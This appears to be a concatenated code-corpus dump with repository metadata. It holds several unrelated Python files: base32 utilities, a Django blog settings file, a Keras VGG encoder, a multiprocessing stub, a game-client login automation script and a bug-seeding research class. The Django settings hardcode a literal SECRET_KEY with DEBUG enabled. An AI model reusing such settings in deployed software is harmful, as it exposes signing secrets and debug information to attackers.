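# verified with the same secret; the helper name below is illustrative only.
def _decode_token(token):
    """Return the username embedded in a token issued by JSONWebTokenAuth."""
    payload = jwt.decode(token, settings.SECRET_KEY, algorithms=['HS256'])
    return payload['username']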
|
[
"priyatapadiya.pt@gmail.com"
] |
priyatapadiya.pt@gmail.com
|
70a634ef5333fbd011fc21983abd792a11a5cfab
|
5955aa5e04a8b976097e92cccc392eaa6f5de0b5
|
/utils/base32_utils.py
|
ce210aab79d9420f6d7cca22fd8d077f62f52b9f
|
[] |
no_license
|
joy-noah-dev/page_backend
|
42afd084864e2c91f7dca7436682a9438a566c93
|
0d0b14fdc29cb98cfdfc2d9948347c819e197761
|
refs/heads/main
| 2023-05-01T11:36:34.168606
| 2021-05-20T02:26:04
| 2021-05-20T02:26:04
| 368,667,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,900
|
py
|
import re
from base64 import b32decode, b32encode
from io import BytesIO
from typing import List
def decode_base32(data: str, altchars='+/') -> bytes:
"""
Decode base32, python requires additional padding
"""
data = re.sub(rf'[^a-zA-Z0-9{altchars}]+', '', data) # normalize
missing_padding = len(data) % 8
if missing_padding:
data += '=' * (8 - missing_padding)
    # b32decode has no altchars parameter (that belongs to b64decode); its second
    # positional argument is casefold, so pass that explicitly.
    return b32decode(data, casefold=True)
def byte_to_int(single_byte: bytes) -> int:
"""
Gets a byte and returns an integer
:param single_byte: Single byte to convert to integer
:return: Integer representation of the bytes
"""
shift = 0
result = 0
if single_byte == b"" or single_byte == "":
raise EOFError("Unexpected EOF while reading varint")
i = ord(single_byte)
result |= (i & 0x7f) << shift
return result
def int_list(data: bytes) -> list:
"""
Get a set bytes and return a list of integers representing the bytes
:param data: Bytes
:return: List of integers
"""
byte_data = BytesIO(data)
byte_list = []
single_byte = byte_data.read(1)
while single_byte != b"" and single_byte != "":
single_int = byte_to_int(single_byte)
byte_list.append(single_int)
single_byte = byte_data.read(1)
return byte_list
def encode_base32_from_list(list_of_int: List[int]) -> str:
"""
Returns a base 32 string from a list of integers
:param list_of_int: List of integers
:return: Base32 string
"""
data = BytesIO()
for i in list_of_int:
buf = b""
while True:
towrite = i & 0x7f
i >>= 7
if i:
buf += bytes((towrite | 0x80,))
else:
buf += bytes((towrite,))
break
data.write(buf)
data.seek(0)
return b32encode(data.read()).decode().replace('=', '')
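# Hedged usage sketch (not part of the original module): round-tripping small integers
# (each < 128, i.e. a single varint byte) through the helpers defined above.
if __name__ == '__main__':
    original = [1, 42, 127]
    encoded = encode_base32_from_list(original)
    assert int_list(decode_base32(encoded)) == original
    print(encoded)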
|
[
"ingesql1992@hotmail.com"
] |
ingesql1992@hotmail.com
|
2fef377287f3c5888e9dcadefea6692585b5f955
|
f109a3176900e1148452201b355be90390f289fc
|
/src/blogify/settings.py
|
645d75a79823d9b11aaa46c40cde6fc504109744
|
[] |
no_license
|
Stretchddt/Blog
|
2d4d6f0ddd0f4708a0ff28c036341d887127c71b
|
3d27fb72e9cf794378e96a0ce1e2dc25d93fc7cb
|
refs/heads/master
| 2023-01-14T15:46:00.810709
| 2020-11-16T16:31:51
| 2020-11-16T16:31:51
| 313,278,693
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,494
|
py
|
"""
Django settings for blogify project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'qmu#byqt%9+-s!lgnykjya)494-r(bw_a1*=2ae)^n@9m-o@d5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'profiles',
'posts',
'users',
'crispy_forms',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'blogify.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'blogify.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
CRISPY_TEMPLATE_PACK = 'bootstrap4'
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static_project')
]
STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "static_root")
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "media_root")
LOGIN_URL = 'users-login'
|
[
"thomsontkd1@gmail.com"
] |
thomsontkd1@gmail.com
|
e017bc2e2567077ac2bfdb3a42079d3e0e32bf69
|
c76d7277493f28ab3f7dc505c38fbcc7d203317e
|
/cv/segmentation/1.segnet/networks/vggnet.py
|
9e9825d6e8b1ddec9da5a320a915997412dfe88f
|
[] |
no_license
|
niuxinzan/tf20_dl
|
4c351a9b77bc14cfb8368ae6bf83e4e8d7296717
|
7792aad655f77717bca4161a5053b51769427453
|
refs/heads/master
| 2023-01-08T11:19:18.408708
| 2020-11-09T07:02:43
| 2020-11-09T07:02:43
| 305,016,171
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,232
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author :buf
# @Email :niuxinzan@cennavi.com.cn
# @File :vggnet.py
# Created by iFantastic on 2020/10/21
import tensorflow as tf
from tensorflow.keras import models,layers,activations
def vggnet_encoder(input_height=416,input_width=416,pretrained='imagenet'):
img_input = tf.keras.Input(shape=(input_height,input_width,3))
    # 416,416,3 -> 208,208,64
    x = layers.Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv1')(img_input)
    x = layers.Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv2')(x)
    x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)
    f1 = x
    # 208,208,64 -> 104,104,128
x = layers.Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x)
x = layers.Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
f2 = x
# 104,104,128 -> 52,52,256
x = layers.Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x)
x = layers.Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x)
x = layers.Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)
f3 = x
# 52,52,256 -> 26,26,512
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x)
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x)
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)
f4 = x
# 26,26,512 -> 13,13,512
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x)
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x)
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)
f5 = x
return img_input, [f1, f2, f3, f4, f5]
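# Hedged usage sketch (not part of the original file): build the encoder and inspect
# the five feature maps that serve as skip connections.
if __name__ == '__main__':
    img_input, feats = vggnet_encoder(input_height=416, input_width=416)
    encoder = models.Model(inputs=img_input, outputs=feats)
    encoder.summary()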
|
[
"nxz0507@163.com"
] |
nxz0507@163.com
|
3169bd2cc3aa5831d52caff6abf1dd7a2a62c3f7
|
40442e8c450bb1cda86bc7c5792f66a8f9fe9863
|
/ProjectSurveillance/migrations/0009_detailtype_drive.py
|
8f523a26866091728db2a19a1eb7e507980f34a0
|
[
"MIT"
] |
permissive
|
psymen145/OVS-django-fe
|
f74620a40ef4245033e0b13370ba90e3509e2191
|
1823e8b42c17276d6b50a63dddd9b04a21c2038c
|
refs/heads/master
| 2021-09-02T01:10:51.008215
| 2017-12-29T15:06:26
| 2017-12-29T15:06:26
| 115,728,436
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 504
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-11-21 16:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ProjectSurveillance', '0008_projectactivity_rowcreation'),
]
operations = [
migrations.AddField(
model_name='detailtype',
name='drive',
field=models.NullBooleanField(db_column='Drive'),
),
]
|
[
"noreply@github.com"
] |
noreply@github.com
|
57c861cd16af96f077cd25db431a46f4feb6d0b2
|
c30d4f174a28aac495463f44b496811ee0c21265
|
/python/helpers/python-skeletons/multiprocessing/__init__.py
|
de9d1ddfa3ca0c043f71519ec442d5c291506ae8
|
[
"Apache-2.0"
] |
permissive
|
sarvex/intellij-community
|
cbbf08642231783c5b46ef2d55a29441341a03b3
|
8b8c21f445550bd72662e159ae715e9d944ba140
|
refs/heads/master
| 2023-05-14T14:32:51.014859
| 2023-05-01T06:59:21
| 2023-05-01T06:59:21
| 32,571,446
| 0
| 0
|
Apache-2.0
| 2023-05-01T06:59:22
| 2015-03-20T08:16:17
|
Java
|
UTF-8
|
Python
| false
| false
| 4,217
|
py
|
"""Skeleton for 'multiprocessing' stdlib module."""
from multiprocessing.pool import Pool
class Process(object):
def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
self.name = ''
self.daemon = False
self.authkey = None
self.exitcode = None
self.ident = 0
self.pid = 0
self.sentinel = None
def run(self):
pass
def start(self):
pass
def terminate(self):
pass
def join(self, timeout=None):
pass
def is_alive(self):
return False
class ProcessError(Exception):
pass
class BufferTooShort(ProcessError):
pass
class AuthenticationError(ProcessError):
pass
class TimeoutError(ProcessError):
pass
class Connection(object):
def send(self, obj):
pass
def recv(self):
pass
def fileno(self):
return 0
def close(self):
pass
def poll(self, timeout=None):
pass
def send_bytes(self, buffer, offset=-1, size=-1):
pass
def recv_bytes(self, maxlength=-1):
pass
def recv_bytes_into(self, buffer, offset=-1):
pass
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def Pipe(duplex=True):
return Connection(), Connection()
class Queue(object):
def __init__(self, maxsize=-1):
self._maxsize = maxsize
def qsize(self):
return 0
def empty(self):
return False
def full(self):
return False
def put(self, obj, block=True, timeout=None):
pass
def put_nowait(self, obj):
pass
def get(self, block=True, timeout=None):
pass
def get_nowait(self):
pass
def close(self):
pass
def join_thread(self):
pass
def cancel_join_thread(self):
pass
class SimpleQueue(object):
def empty(self):
return False
def get(self):
pass
def put(self, item):
pass
class JoinableQueue(multiprocessing.Queue):
def task_done(self):
pass
def join(self):
pass
def active_children():
"""
:rtype: list[multiprocessing.Process]
"""
return []
def cpu_count():
return 0
def current_process():
"""
:rtype: multiprocessing.Process
"""
return Process()
def freeze_support():
pass
def get_all_start_methods():
return []
def get_context(method=None):
pass
def get_start_method(allow_none=False):
pass
def set_executable(path):
pass
def set_start_method(method):
pass
class Barrier(object):
def __init__(self, parties, action=None, timeout=None):
self.parties = parties
self.n_waiting = 0
self.broken = False
def wait(self, timeout=None):
pass
def reset(self):
pass
def abort(self):
pass
class Semaphore(object):
def __init__(self, value=1):
pass
def acquire(self, blocking=True, timeout=None):
pass
def release(self):
pass
class BoundedSemaphore(multiprocessing.Semaphore):
pass
class Condition(object):
def __init__(self, lock=None):
pass
def acquire(self, *args):
pass
def release(self):
pass
def wait(self, timeout=None):
pass
def wait_for(self, predicate, timeout=None):
pass
def notify(self, n=1):
pass
def notify_all(self):
pass
class Event(object):
def is_set(self):
return False
def set(self):
pass
def clear(self):
pass
def wait(self, timeout=None):
pass
class Lock(object):
def acquire(self, blocking=True, timeout=-1):
pass
def release(self):
pass
class RLock(object):
def acquire(self, blocking=True, timeout=-1):
pass
def release(self):
pass
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def Value(typecode_or_type, *args, **kwargs):
pass
def Array(typecode_or_type, size_or_initializer, lock=True):
pass
def Manager():
return multiprocessing.SyncManager()
|
[
"andrey.vlasovskikh@jetbrains.com"
] |
andrey.vlasovskikh@jetbrains.com
|
2e12579543198362bbc5700bcf87a57054c877db
|
fb87f29a2cc1997b38943191a416cc32ba095f6d
|
/doc.py
|
b66347cb1de430daca2a52196f407489a0ae3f72
|
[] |
no_license
|
Lludion/QGOL
|
05a6e58c69085ec89a09a2d482fce96eded70ec5
|
03b902a2fb2334a008b2ec840f094cf71b372f0d
|
refs/heads/main
| 2023-01-08T21:50:25.577876
| 2020-11-11T10:46:42
| 2020-11-11T10:50:06
| 303,635,962
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51
|
py
|
from doc.documentation_creator import main
main()
|
[
"ulysse.remond@outlook.fr"
] |
ulysse.remond@outlook.fr
|
401300d2f39d7307cb7f691dce9ee2bd2a9ffa97
|
1c5321bf1d26e9c63add1c951ca283571188dfb2
|
/lol.py
|
a6dd3084aa5d338299317ab75b1ab7241c48ff84
|
[] |
no_license
|
CryNando/BOTCreateCustomMatchLOL
|
e5c015dc40b7e784c5daff09baea711f7b904e64
|
2310a40c949b74955f0c956f5c589549caaec731
|
refs/heads/master
| 2020-03-20T19:03:11.610256
| 2018-06-17T00:28:44
| 2018-06-17T00:28:44
| 137,618,724
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,225
|
py
|
# encoding: utf-8
import os
import time
import pyautogui
os.startfile(r"C:\Riot Games\League of Legends\LeagueClient.exe")
print ("Aguardando tela de Login")
time.sleep(20)
print("Colocando Usuário")
pyautogui.click(1033,229, duration=1.00) #posição Username
pyautogui.typewrite('seuusuario', 0.25)
time.sleep(1)
print("Colocando Senha")
pyautogui.click(1033,271, duration=1.00) #posicao password
pyautogui.typewrite('suasenha', 0.25)
time.sleep(1)
print ("Clicando em Iniciar Sessão")
pyautogui.click(1102,521, duration=1.00) #posicao password
print("Aguardando Jogo Abrir")
time.sleep(60)
print ("Clicando em Jogar ")
pyautogui.click(269,109, duration=1.00)
time.sleep(1)
print "Selecionando Modo Personalizado"
pyautogui.click(555,159, duration=1.00)
print "Selecionando Modo Alternando"
pyautogui.click(771,440, duration=1.00)
print "Confirmando Partida"
pyautogui.click(594,621, duration=1.00)
time.sleep(5)
print "Adicionando Bot 1"
pyautogui.click(920,264, duration=1.00)
time.sleep(1)
print "Adicionando Bot 2"
pyautogui.click(909,305, duration=1.00)
time.sleep(1)
print "Adicionando Bot 3"
pyautogui.click(915,351, duration=1.00)
time.sleep(1)
print "Adicionando Bot 4"
pyautogui.click(925,382, duration=1.00)
print "Adicionando Bot 5"
pyautogui.click(916,418, duration=1.00)
time.sleep(1)
print("Clicando em Inicar")
pyautogui.click(620,628, duration=1.00)
time.sleep(10)
print ("Banindo primeiro Campeão")
pyautogui.click(828,158, duration=1.00)
pyautogui.typewrite('LeBlanc', 0.25)
time.sleep(1)
pyautogui.click(484,196, duration=1.00)
pyautogui.click(686,565, duration=1.00)
time.sleep(2)
print ("Banindo segundo Campeão")
pyautogui.click(828,158, duration=1.00)
pyautogui.typewrite('Ahri', 0.25)
pyautogui.click(484,196, duration=1.00)
pyautogui.click(686,565, duration=1.00)
time.sleep(2)
print ("Banindo terceiro Campeão")
pyautogui.click(828,158, duration=1.00)
pyautogui.typewrite('Nocturne', 0.25)
pyautogui.click(484,196, duration=1.00)
pyautogui.click(686,565, duration=1.00)
time.sleep(2)
print ("Selecionando seu Campeão")
pyautogui.click(828,158, duration=1.00)
pyautogui.typewrite('Rengar', 0.25)
pyautogui.click(484,196, duration=1.00)
time.sleep(1)
pyautogui.click(686,565, duration=1.00)
|
[
"crynando@outlook.com"
] |
crynando@outlook.com
|
269e711a13c5b31a03861276ace784b6574ce8fc
|
626c4e5c797e943ffa1a31560b929f3646963c6a
|
/bluelog/blueprints/blog.py
|
c0c1ee564b5e1cd5cf8aaa01cddc68c6f9319048
|
[] |
no_license
|
BrightHsu/Myblog
|
b53543363205c104b017ab6b2c0d2ef232fbecde
|
73b2d7f926683b18da4fe505de0205de488782b6
|
refs/heads/master
| 2023-03-27T22:21:48.583778
| 2020-06-12T02:13:42
| 2020-06-12T02:13:42
| 270,941,342
| 0
| 0
| null | 2021-03-20T04:27:26
| 2020-06-09T08:08:16
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 5,368
|
py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
@Time : 2020/6/1 11:42
@Author : David Ben
@FileName: __init__.py.py
@Email: hsudavid@163.com
@Software: PyCharm
"""
from flask import Blueprint, render_template, flash, redirect, url_for, request, make_response
from flask import current_app
from bluelog.models import Post, Comment, Reply, Category
from bluelog.utils import redirect_back
from bluelog.forms import CommentForm, AdminCommentForm
from flask_login import current_user
from bluelog.extensions import db
from bluelog.emails import send_new_comment_email, send_new_reply_email
blog_bp = Blueprint('blog', __name__)
@blog_bp.route('/')
def index():
page = request.args.get('page', 1, type=int)
per_page = current_app.config['BLUELOG_POST_PER_PAGE']
pagination = Post.query.order_by(
Post.timestamp.desc()).paginate(
page, per_page)
posts = pagination.items
return render_template(
'blog/index.html',
pagination=pagination,
posts=posts)
@blog_bp.route('/about')
def about():
return render_template('blog/about.html')
@blog_bp.route('/change/<path:theme>')
def change_theme(theme):
response = make_response(redirect_back())
response.set_cookie('theme', theme, max_age=30 * 24 * 60 * 60)
return response
@blog_bp.route('/show/post/<int:post_id>', methods=['GET', 'POST'])
def show_post(post_id):
post = Post.query.get_or_404(post_id)
page = request.args.get('page', 1, type=int)
per_page = current_app.config['BLUELOG_COMMENT_PRE_PAGE']
pagination = Comment.query.with_parent(post).filter_by(
reviewed=True) .order_by(
Comment.timestamp.asc()).paginate(
page=page,
per_page=per_page)
comments = pagination.items
if current_user.is_authenticated:
form = AdminCommentForm()
form.name.data = current_user.name
form.email.data = current_app.config['BLUELOG_EMAIL']
form.site.data = url_for('.index')
reviewed = True
from_admin = True
else:
form = CommentForm()
reviewed = False
from_admin = False
if form.validate_on_submit():
author = form.name.data
email = form.email.data
site = form.site.data
body = form.comment.data
comment = Comment(
author=author,
email=email,
site=site,
body=body,
reviewed=reviewed,
from_admin=from_admin,
post=post)
db.session.add(comment)
db.session.commit()
if current_user.is_authenticated:
flash('您的评论已发送', 'success')
else:
flash('感谢您的评论, 该评论需要通过审核后才能显示', 'info')
            send_new_comment_email(post)  # notify the admin of the new comment
return redirect(url_for('.show_post', post_id=post.id))
return render_template(
'blog/post.html',
post=post,
comments=comments,
pagination=pagination,
form=form)
@blog_bp.route('/reply/form/<int:comment_id>', methods=['POST'])
def reply_form(comment_id):
comment = Comment.query.get_or_404(comment_id)
if current_user.is_authenticated:
form = AdminCommentForm()
form.name.data = current_user.name
form.email.data = current_app.config['BLUELOG_EMAIL']
form.site.data = url_for('.index')
# reviewed = True
from_admin = True
else:
form = CommentForm()
# reviewed = False
from_admin = False
if form.validate_on_submit():
author = form.name.data
email = form.email.data
site = form.site.data
body = form.comment.data
reply = Reply(author=author, email=email, site=site, body=body, from_admin=from_admin,
comment=comment)
db.session.add(reply)
db.session.commit()
flash('您的评论已发送', 'success')
        send_new_reply_email(comment)  # notify the original commenter of the reply
return redirect(url_for('.show_post', post_id=comment.post_id))
return redirect_back()
@blog_bp.route('/show/category/<int:category_id>')
def show_category(category_id):
category = Category.query.get_or_404(category_id)
page = request.args.get('page', 1, type=int)
per_page = current_app.config['BLUELOG_POST_PER_PAGE']
pagination = Post.query.with_parent(category).order_by(
Post.timestamp.desc()).paginate(
page=page, per_page=per_page)
posts = pagination.items
return render_template(
'blog/category.html',
category=category,
pagination=pagination,
posts=posts)
@blog_bp.route('/reply/comment/<int:comment_id>')
def reply_comment(comment_id):
comment = Comment.query.get_or_404(comment_id)
r_id = request.args.get('next')
page = request.args.get('page')
if not comment.post.can_comment:
flash('评论已关闭, 无法进行评论', 'warning')
return redirect(url_for('.show_post', post_id=comment.post.id))
return redirect(
url_for(
'.show_post',
post_id=comment.post_id,
reply=comment_id,
author=comment.author,
r_id=r_id,
page=page,
admin=comment.from_admin) +
'#comment-form')
|
[
"hsudavid@163.com"
] |
hsudavid@163.com
|
7cae39a80777cd2319715cb741204ebda891e051
|
3d1297a6c2c16f51dc43130d85daf1e32edefa14
|
/main/views.py
|
bfdba79954465c8d279a8324fb176db88b271c34
|
[] |
no_license
|
Nissel21/linioexp
|
bf6cef97ba75b37db5ebe7dee7f64e3ce6ba747d
|
e66ef8a30d9ee7d4ae236fbdf033840380c2e6a5
|
refs/heads/master
| 2022-12-30T03:00:59.973262
| 2020-09-23T06:03:44
| 2020-09-23T06:03:44
| 297,853,999
| 1
| 0
| null | 2020-10-05T06:38:33
| 2020-09-23T04:39:45
|
Python
|
UTF-8
|
Python
| false
| false
| 400
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.views.generic import ListView, DetailView
from .models import Producto
# Create your views here.
def home(request):
return HttpResponse("Hola, te encuentras en la página de inicio del Linio Express")
class ProductListView(ListView):
model = Producto
class ProductDetailView(DetailView):
model = Producto
|
[
"71747645+Nissel21@users.noreply.github.com"
] |
71747645+Nissel21@users.noreply.github.com
|
aee870e083624fa9410fb6c88a23bfa18a7fa8c8
|
31bfebbc0739bf8e81fb63b1fc35dab45c1aee8c
|
/bug_seeding/bug_seeding_approaches/SeedBugs.py
|
a5b1525f267786c4678522c245d816d571eb3078
|
[
"MIT"
] |
permissive
|
mxmws/SemSeed
|
85527f1c4c1b80dce38c2687e6b725967c287484
|
278bf1ae3bb371bbe98965556d1fbb3a38b8c6f5
|
refs/heads/main
| 2023-06-03T06:04:17.966491
| 2021-06-17T17:40:39
| 2021-06-17T17:40:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,595
|
py
|
"""
Created on 24-March-2020
@author Jibesh Patra
"""
from abc import ABC, abstractmethod
from typing import List, Tuple
class SeedBugs(ABC):
def __init__(self, bug_seeding_pattern: dict, target_location: dict, file_path: str):
        # Metadata about the seeded bug, e.g. the buggy/correct token sequences, surrounding tokens, usable identifiers, literals, etc.
self.bug_metadata = {
'file_name_where_intended': file_path,
"target_token_sequence-Correct": target_location['tokens'], # Abstract token sequence that will be mutated
"target_token_sequence-Buggy": [], # Concrete token sequence generated after mutation
"token_sequence_abstraction-Correct": target_location['abstractedTokens'],
"token_sequence_abstraction-Buggy": [],
"target_line_range": {'line': target_location['line'], 'range': target_location['range']},
"num_of_available_identifiers_to_choose_from": 0,
"num_of_available_literals_to_choose_from": 0,
"error": False
}
self.bug_seeding_pattern = bug_seeding_pattern
self.target_location = target_location
@abstractmethod
def is_matching_token_sequence(self) -> bool:
"""
For a 'syntactic' match check, this will return True if the
token sequence in abstracted form match.
For a 'semantic' matching this will depend on the cosine distance of the
embedding of the tokens along with the threshold.
:return:
"""
raise NotImplementedError
@abstractmethod
def apply_pattern(self) -> List[List]:
"""
Seed a bug by applying a given pattern
:return:
"""
raise NotImplementedError
def extract_tokens_of_kinds(self, given_token_seq: List[str]) -> Tuple[List, List, List]:
try:
assert len(given_token_seq) == len(self.target_location['abstractedTokens'])
        except AssertionError:
            print("The lengths of these token sequences should be the same")
tokens = []
idf_tokens = []
lit_tokens = []
idf_prefix = 'Idf_'
lit_prefix = 'Lit_'
for i, abs_tok in enumerate(self.target_location['abstractedTokens']):
concrete_token = given_token_seq[i]
if abs_tok.startswith(idf_prefix) or abs_tok.startswith(lit_prefix):
tokens.append(concrete_token)
if abs_tok.startswith(idf_prefix):
idf_tokens.append(concrete_token)
elif abs_tok.startswith(lit_prefix):
lit_tokens.append(concrete_token)
return tokens, idf_tokens, lit_tokens
def replace_target_with_mutated_token_sequence(self, token_list: List, token_range_list: List,
mutated_token_sequence: List) -> List:
"""
Once the mutated token sequence has been found replace the target token sequence with this new
:param token_list: The complete list of the token in the file
:param token_range_list: The ranges of each token contained in the token list
:param mutated_token_sequence: The token sequence that will be inserted to seed bugs
:return: Token sequence after seeding the bug
"""
assert len(token_list) == len(token_range_list)
start_range = self.target_location["range"][0]
end_range = self.target_location["range"][1]
indices_to_remove = [i for i, rng in enumerate(token_range_list) if int(rng.split(
'-')[0]) >= start_range and int(rng.split('-')[1]) <= end_range]
part1 = token_list[:indices_to_remove[0]]
part2 = token_list[indices_to_remove[-1] + 1:]
token_list_after_seeding = part1 + mutated_token_sequence + part2
assert len(token_list_after_seeding) == len(token_list) - len(self.target_location['tokens']) + len(
mutated_token_sequence)
return token_list_after_seeding
def get_abstract_token_to_concrete_mapping(self) -> dict:
"""
This creates a mapping of the abstract token to its actual value
Eg. 'Idf_1' -> 'a'
"""
mappings = {}
for i, abstract_tok in enumerate(self.target_location['abstractedTokens']):
if not abstract_tok.startswith('Idf_') and not abstract_tok.startswith('Lit_'):
continue
mappings[abstract_tok] = self.target_location['tokens'][i]
return mappings
def write_bug_seeded_file(self):
pass
def __call__(self, *args, **kwargs):
pass
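# Hedged sketch (not part of the original module): a minimal concrete subclass, only to
# illustrate the abstract interface. The matching rule and the 'fix'/'buggy' keys of the
# seeding pattern are assumptions, not necessarily SemSeed's actual pattern format.
class ExactMatchSeeding(SeedBugs):
    def is_matching_token_sequence(self) -> bool:
        return self.target_location['abstractedTokens'] == self.bug_seeding_pattern.get('fix', [])
    def apply_pattern(self) -> List[List]:
        mapping = self.get_abstract_token_to_concrete_mapping()
        buggy = [mapping.get(tok, tok) for tok in self.bug_seeding_pattern.get('buggy', [])]
        return [buggy]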
|
[
"jibesh@Jibeshs-MacBook-Pro.local"
] |
jibesh@Jibeshs-MacBook-Pro.local
|
d45a656414a1df2c05be824ff7ff20650f0968ee
|
b624f0d085642618a3935e0888e9a53a17c8361c
|
/tms/tmsapp/models.py
|
04c35de188f04f1a65eac39a20a297115eb97a98
|
[] |
no_license
|
Alton1998/TMS-APP
|
1df685671127980e72ffa6ab2ab95a848a4c358c
|
828dac35b55028bc77da5818ed501b03272932ab
|
refs/heads/master
| 2020-03-23T02:00:41.965194
| 2018-07-16T15:30:04
| 2018-07-16T15:30:04
| 140,950,992
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 824
|
py
|
from django.db import models
# Creating models
class trafficAtA(models.Model):
    Trafficdensity = models.FloatField()
    time = models.TimeField(auto_now_add=True)
    def __str__(self):
        # __str__ must return a string, not a tuple
        return "%s at %s" % (self.Trafficdensity, self.time)
class trafficAtB(models.Model):
    Trafficdensity = models.FloatField()
    time = models.TimeField(auto_now_add=True)
    def __str__(self):
        return "%s at %s" % (self.Trafficdensity, self.time)
class trafficAtC(models.Model):
    Trafficdensity = models.FloatField()
    time = models.TimeField(auto_now_add=True)
    def __str__(self):
        return "%s at %s" % (self.Trafficdensity, self.time)
class trafficAtD(models.Model):
    Trafficdensity = models.FloatField()
    time = models.TimeField(auto_now_add=True)
    def __str__(self):
        return "%s at %s" % (self.Trafficdensity, self.time)
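# Hedged usage sketch (not part of the original file): recording a reading and fetching
# the most recent one, e.g. from a view or the Django shell.
#   trafficAtA.objects.create(Trafficdensity=0.42)
#   latest = trafficAtA.objects.latest('time')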
|
[
"noreply@github.com"
] |
noreply@github.com
|
4e3e8013222191f5557eeefbb7ca5e65131aeece
|
aebc347ff9a8ad739111f13aa8d4cf9d48a1e4bd
|
/data/170818/170818_074301_spectral_scan/0019_electron_loading_trap_studies_E5071C.py
|
b1d29626c5ebe7e0216866f17a237346e2a494bb
|
[] |
no_license
|
geyang/170422_EonHe_M018V6
|
f01a60d3b8a911ba815a0fcc0bf1b6e2aa8f5f17
|
ce189e22f99942e46fce84a0dca714888e44bc69
|
refs/heads/master
| 2021-06-22T21:01:23.257239
| 2017-08-25T09:48:17
| 2017-08-25T09:48:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,239
|
py
|
